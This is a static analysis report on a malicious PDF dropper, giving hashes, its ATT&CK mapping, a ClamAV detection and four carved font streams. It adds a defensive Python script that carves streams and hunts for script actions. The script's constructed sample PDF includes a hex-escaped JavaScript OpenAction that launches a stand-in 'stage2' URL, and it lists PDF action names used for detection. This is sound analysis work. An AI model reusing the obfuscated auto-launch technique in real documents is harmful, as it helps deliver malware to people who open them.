Malicious PDF — malware analysis report

Static analysis result for SHA-256 48d3ce4ba383f281…

Verdict: MALICIOUS
File type: PDF
Size: 43.3 KB
Created: 2017-08-29 09:04:21
Authoring application: PScript5.dll Version 5.2 (via GPL Ghostscript 8.15)
MD5: b85e2bfa031c39a76d11f832a066b402
SHA-1: 8dfe02a788489b4166ebb7f131c5a7aa2cce8477
SHA-256: 48d3ce4ba383f281703d30d39a0221286f2228b338b992f203dcf218f680e6d6
Risk score: 60

Malware Insights

MITRE ATT&CK
  • T1566.001 Phishing: Spearphishing Attachment
  • T1204.002 User Execution: Malicious File

ClamAV flags the file as malicious with the signature Pdf.Dropper.Agent-7257292-0, and the Nyx PDF classifier gives it a clean score of 0.0001. The document body is heavily obfuscated and not readable as text, which is consistent with an attempt to hide its contents from casual inspection. Embedded font streams are normal in PDFs (Ghostscript-produced documents routinely embed CFF font subsets), but in an obfuscated document they can also serve as a container for exploit code, so the four CFF font streams carved below should be examined rather than assumed benign. The signature name ("Dropper") and the ATT&CK mapping point to a document that exploits a PDF reader vulnerability in order to download and execute a second-stage payload. That is an inference from the signature and the obfuscation: the static analysis lists no extracted script, action or second-stage URL, so the delivery mechanism is not confirmed by this report alone.
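As an added example (not part of this report or of the analysis platform's own tooling), the Python script below performs the two checks a practitioner would want next on a sample like this one: it carves embedded font streams and records them in the same shape as the artifact table (name, file offset, decoded size, SHA-256; hashing the inflated bytes rather than the raw compressed stream is an assumption about how the table was built), and it hunts for action and script names, including hex-escaped spellings such as /J#61vaScript, in both object dictionaries and inflated streams. The PDF it runs on is constructed inline for the example; its object layout, font name and URL are made up.

```python
import hashlib
import re
import zlib

# Constructed sample input for this example (not the analysed file): a minimal PDF
# with one FlateDecode-compressed CFF font program (/Subtype /Type1C is how PDF
# labels a bare CFF stream referenced from /FontFile3) and an /OpenAction that runs
# JavaScript, with the /JavaScript name hex-escaped as obfuscated documents often do.
FONT_PROGRAM = b"\x01\x00\x04\x01" + b"CFF-FONT-BODY" * 4
FONT_DEFLATED = zlib.compress(FONT_PROGRAM)
_JS = b"app.launchURL('http://example.invalid/stage2');"

SAMPLE_PDF = b"".join([
    b"%PDF-1.4\n",
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R >> endobj\n",
    b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n",
    b"3 0 obj << /Type /FontDescriptor /FontName /Obfusc /FontFile3 4 0 R >> endobj\n",
    b"4 0 obj << /Subtype /Type1C /Filter /FlateDecode /Length %d >>\n" % len(FONT_DEFLATED),
    b"stream\n", FONT_DEFLATED, b"\nendstream\nendobj\n",
    b"5 0 obj << /S /J#61vaScript /JS (" + _JS + b") >> endobj\n",
    b"trailer << /Root 1 0 R >>\n%%EOF\n",
])

OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)\bendobj", re.DOTALL)
STREAM_RE = re.compile(rb"(?<!end)stream\r?\n")
LENGTH_RE = re.compile(rb"/Length\s+(\d+)(\s+\d+\s+R)?")   # group 2 set => indirect ref
NAME_ESCAPE_RE = re.compile(rb"#([0-9A-Fa-f]{2})")
ACTIVE_CONTENT_NAMES = (b"/JavaScript", b"/JS", b"/OpenAction", b"/AA",
                        b"/Launch", b"/EmbeddedFile", b"/RichMedia", b"/URI")


def normalize_names(data: bytes) -> bytes:
    """Resolve #xx escapes so /J#61vaScript compares equal to /JavaScript."""
    return NAME_ESCAPE_RE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def iter_objects(pdf: bytes):
    """Yield (object number, dictionary bytes, stream bytes or None, stream offset).
    A direct /Length is honoured; otherwise fall back to scanning for 'endstream',
    which binary stream data can spoof."""
    for m in OBJ_RE.finditer(pdf):
        body = m.group(3)
        sm = STREAM_RE.search(body)
        if sm is None:
            yield int(m.group(1)), body, None, None
            continue
        header, start = body[:sm.start()], sm.end()
        lm = LENGTH_RE.search(header)
        if lm and lm.group(2) is None:
            data = body[start:start + int(lm.group(1))]
        else:
            data = body[start:body.rfind(b"endstream")].rstrip(b"\r\n")
        yield int(m.group(1)), header, data, m.start(3) + start


def decode_stream(header: bytes, raw: bytes) -> bytes:
    """Inflate FlateDecode streams; tolerate truncation and trailing junk."""
    if b"/FlateDecode" not in normalize_names(header):
        return raw
    try:
        return zlib.decompressobj().decompress(raw)
    except zlib.error:
        return b""


def carve_font_streams(pdf: bytes):
    """Carve embedded font programs: name, stream offset, decoded size, SHA-256
    (hash taken over the inflated bytes, an assumption about the report's table)."""
    fonts = []
    for num, header, data, offset in iter_objects(pdf):
        if data is None:
            continue
        hdr = normalize_names(header)
        if b"/Type1C" in hdr:
            kind = "cff"
        elif b"/OpenType" in hdr:
            kind = "otf"
        elif b"/Length1" in hdr:     # Type1 (/FontFile) or TrueType (/FontFile2) program
            kind = "fontfile"
        else:
            continue
        decoded = decode_stream(hdr, data)
        fonts.append({"name": "font_%02d_%s_off%08x.bin" % (len(fonts), kind, offset),
                      "object": num, "offset": offset, "size": len(decoded),
                      "sha256": sha256_hex(decoded)})
    return fonts


def find_active_content(pdf: bytes):
    """List action/script names found in any dictionary or inflated stream,
    after undoing #xx name escapes."""
    hits = set()
    for _num, header, data, _off in iter_objects(pdf):
        views = [normalize_names(header)]
        if data is not None:
            views.append(normalize_names(decode_stream(header, data)))
        for view in views:
            for name in ACTIVE_CONTENT_NAMES:
                if re.search(re.escape(name) + rb"(?![A-Za-z])", view):
                    hits.add(name.decode())
    return sorted(hits)


if __name__ == "__main__":
    for font in carve_font_streams(SAMPLE_PDF):
        print(font)
    print("active content:", find_active_content(SAMPLE_PDF))
```

Run it against a real sample by replacing SAMPLE_PDF with the file's bytes. Two limits worth knowing: the regex object walker does not parse cross-reference tables or object streams (/Type /ObjStm), so dictionaries packed into a compressed object stream are only seen because find_active_content also inflates streams; and an indirect /Length forces the 'endstream' scan, which a crafted stream can confuse. For a heavily obfuscated document, carving every FlateDecode stream and hashing it, not only the font streams, is the next step.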

Machine Learning

  • Nyx PDF Classifier: clean score 0.0001 (the model assigns the file almost no probability of being benign)

Heuristics (1)

  • ClamAV: Pdf.Dropper.Agent-7257292-0 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Pdf.Dropper.Agent-7257292-0

Extracted artifacts (4)

Files carved from inside the sample during analysis.

Columns: Filename, SHA-256, Kind, Source, Size

font_00_cff_off00006b15.bin
  SHA-256: a6505192114922a765b3c4c5264d803089e44eb64e2c59f950fd6fb797069a8e
  Kind:    pdf-font-stream
  Source:  PDF embedded font (cff) at offset 0x6B15
  Size:    3422 bytes

font_01_cff_off00007710.bin
  SHA-256: 2d5654163f6b2b66fa9ac61e63d545d858801738382f05b25ce15c954f09b846
  Kind:    pdf-font-stream
  Source:  PDF embedded font (cff) at offset 0x7710
  Size:    2275 bytes

font_02_cff_off00007f4d.bin
  SHA-256: 40b685bc77349df0a43e9b86e7bcc512f73580ff51fe888f99c6502a08b19ad7
  Kind:    pdf-font-stream
  Source:  PDF embedded font (cff) at offset 0x7F4D
  Size:    2854 bytes

font_03_cff_off000089ee.bin
  SHA-256: 7c279663ac55e1071d11f07d731e7f1a843bed0d49bf97e5724c4b7e2b87d3af
  Kind:    pdf-font-stream
  Source:  PDF embedded font (cff) at offset 0x89EE
  Size:    5644 bytes